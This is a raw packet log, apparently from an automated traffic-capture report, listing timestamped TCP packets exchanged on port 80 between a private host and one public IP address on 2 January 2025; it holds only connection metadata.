                                                                            Jan 2, 2025 20:34:52.043476105 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.043477058 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.043487072 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.043498039 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.043509960 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.043514013 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.043524027 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.043535948 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.043536901 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.043548107 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.043556929 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.043557882 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.043569088 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.043579102 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.043582916 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.043589115 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.043602943 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.043612957 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.043620110 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.043649912 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.046061993 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.046077013 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.046092033 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.046108961 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.046112061 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.046120882 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.046130896 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.046140909 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.046152115 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.046156883 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.046179056 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.046196938 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.049097061 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.049113035 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.049124956 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.049134970 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.049141884 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.049145937 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.049156904 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.049168110 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.049169064 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.049180984 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.049221992 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.049237013 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.051395893 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.051429987 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.051440001 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.051450968 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.051461935 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.051493883 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.051632881 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.051644087 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.051655054 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.051665068 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.051681042 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.051700115 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.054106951 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.054127932 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.054138899 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.054148912 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.054160118 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.054169893 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.054182053 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.054191113 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.054193020 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.054256916 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.059286118 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.059309959 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.059351921 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.059362888 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.059380054 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.059389114 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.059391022 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.059401989 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.059412956 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.059423923 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.059434891 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.059446096 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.059451103 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.059461117 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.059472084 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.059483051 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.059483051 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.059503078 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.059520960 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.061276913 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.061292887 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.061305046 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.061316013 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.061326981 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.061328888 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.061336994 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.061347961 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.061358929 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.061363935 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.061382055 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.061399937 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.062362909 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.062376022 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.062387943 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.062416077 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.062447071 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.062458038 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.062474966 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.062485933 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.062495947 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.062505960 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.062509060 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.062539101 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.131640911 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.131674051 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.131685972 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.131702900 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.131705046 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.131715059 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.131726980 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.131737947 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.131737947 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.131748915 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.131753922 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.131758928 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.131768942 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.131776094 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.131786108 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.131799936 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.131808996 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.131820917 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.131827116 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.131838083 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.131849051 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.131850004 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.131863117 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.131863117 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.131872892 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.131885052 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.131897926 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.131926060 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.131943941 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.131954908 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.131966114 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.131975889 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.131987095 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.131989002 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.131998062 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.132011890 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.132024050 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.132055044 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.132066965 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.132076979 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.132088900 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.132113934 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.132138014 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.132162094 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.132174969 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.132184982 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.132195950 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.132206917 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.132211924 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.132217884 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.132245064 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.132258892 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.132263899 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.132327080 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.132333994 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.132338047 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.132349968 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.132359982 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.132363081 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.132370949 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.132385969 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.132421970 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.132422924 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.132433891 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.132467031 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.132538080 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.132549047 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.132560015 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.132572889 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.132580042 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.132585049 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.132595062 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.132606983 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.132616043 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.132639885 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.132656097 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.132673979 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.132684946 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.132704020 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.132711887 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.132714033 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.132724047 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.132725000 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.132735968 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.132760048 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.132783890 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.132796049 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.132827997 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.132838964 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.132849932 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.132869005 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.132874966 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.132894993 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.132910013 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.132914066 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.132920027 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.132950068 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.132987022 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.133024931 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.135900021 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.135935068 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.135945082 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.135945082 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.135956049 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.135967970 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.135976076 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.136006117 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.136014938 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.136017084 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.136028051 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.136045933 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.136045933 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.136069059 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.136086941 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.138325930 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.138376951 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.138392925 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.138405085 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.138416052 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.138426065 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.138430119 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.138438940 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.138451099 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.138451099 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.138480902 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.138497114 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.140836000 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.140850067 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.140868902 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.140882969 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.140886068 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.140897989 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.140904903 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.140908957 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.140921116 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.140943050 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.140945911 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.140960932 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.140988111 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.145983934 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.146018028 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.146029949 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.146050930 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.146055937 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.146070957 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.146083117 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.146095037 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.146115065 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.146136999 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.146182060 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.146192074 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.146202087 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.146213055 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.146223068 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.146225929 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.146241903 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.146251917 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.146260977 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.146265984 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.146272898 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.146286964 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.146290064 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.146300077 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.146305084 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.146311045 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.146320105 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.146333933 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.146348953 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.146367073 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.146400928 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.148063898 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.148076057 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.148094893 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.148107052 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.148111105 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.148116112 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.148134947 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.148143053 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.148153067 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.148156881 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.148161888 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.148171902 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.148183107 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.148188114 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.148191929 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.148221016 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.148241997 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.149182081 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.149194956 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.149204969 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.149223089 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.149244070 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.149259090 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.149275064 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.149286032 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.149296045 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.149306059 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.149315119 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.149346113 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.218451023 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.218468904 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.218482018 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.218492985 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.218503952 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.218514919 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.218519926 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.218525887 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.218539953 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.218554974 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.218607903 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.218612909 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.218633890 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.218645096 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.218671083 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.218683958 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.218724966 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.218736887 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.218748093 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.218760014 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.218777895 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.218780041 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.218791962 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.218796968 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.218801975 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.218813896 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.218815088 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.218827963 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.218830109 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.218852043 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.218875885 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.218898058 CET804973047.254.187.72192.168.2.4
